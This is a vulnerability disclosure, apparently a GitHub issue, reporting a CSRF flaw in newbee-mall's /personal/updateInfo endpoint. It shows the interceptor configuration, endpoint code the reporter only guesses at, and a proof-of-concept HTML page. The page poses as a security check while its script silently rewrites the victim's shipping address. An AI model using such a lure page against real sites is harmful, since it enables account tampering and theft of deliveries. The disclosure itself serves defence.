
CSRF Vulnerability in Personal Information Update #114

@flashzyc

Summary

A CSRF vulnerability exists in the personal information update endpoint /personal/updateInfo. Attackers can modify users' personal information including shipping addresses, potentially redirecting deliveries to attacker-controlled locations.

Vulnerability Details

Configuration-Level Issue

File: src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java

import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Configuration;
import org.springframework.web.servlet.config.annotation.InterceptorRegistry;
import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;

@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
    @Autowired
    private NewBeeMallLoginInterceptor newBeeMallLoginInterceptor; // bean type assumed from the field name

    @Override
    public void addInterceptors(InterceptorRegistry registry) {
        registry.addInterceptor(newBeeMallLoginInterceptor)
                .addPathPatterns("/personal/updateInfo");
        // ❌ Only authentication check, no CSRF protection
    }
}

Endpoint-Level Code Analysis

Based on the project structure, the personal information update endpoint likely follows this pattern:

@PostMapping("/personal/updateInfo")
@ResponseBody
public Result updateUserInfo(@RequestBody MallUser mallUser, HttpSession httpSession) {
    NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
    // ❌ No CSRF token validation
    // ⚠️ Allows modification of sensitive user data including address
    mallUser.setUserId(user.getUserId());
    return mallUserService.updateUserInfo(mallUser);
}

Security Issues:

  1. ❌ No CSRF token validation
  2. ⚠️ Can modify shipping address to attacker's location
  3. ⚠️ Combined with order CSRF, enables complete delivery hijacking

Proof of Concept (PoC)

<!DOCTYPE html>
<html>
<head>
    <title>Profile Verification Required</title>
</head>
<body>
    <h2>🔐 Security Check: Verify Your Information</h2>
    <p>We're updating our security settings. Please verify your account...</p>
    
    <script>
        // Modify user's shipping address
        fetch('http://localhost:28089/personal/updateInfo', {
            method: 'POST',
            credentials: 'include',
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify({
                nickName: 'User',
                introduceSign: 'Normal user',
                address: '123 Attacker Street, Hacker City, 99999',  // Attacker's address
                // Other user fields remain unchanged
            })
        })
        .then(response => response.json())
        .then(data => {
            document.body.innerHTML = '<h3>✅ Verification complete! Thank you.</h3>';
        });
    </script>
</body>
</html>

Impact

User information tampering and delivery hijacking: attackers can redirect product deliveries to their own addresses, leading to theft and financial loss for users.

CVSS Score: 7.3 (High)
